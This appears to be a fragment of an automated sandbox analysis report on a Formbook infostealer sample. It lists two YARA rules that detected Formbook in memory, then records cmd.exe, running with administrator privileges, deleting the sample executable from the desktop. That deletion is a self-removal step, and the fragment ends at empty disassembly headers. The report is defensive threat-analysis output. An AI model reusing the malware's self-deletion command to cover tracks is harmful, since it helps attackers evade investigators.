                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                        General

                                                        Start time:17:37:57
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\ejecutable2.exe'
                                                        Imagebase:0x49fd0000
                                                        File size:302592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Code Analysis
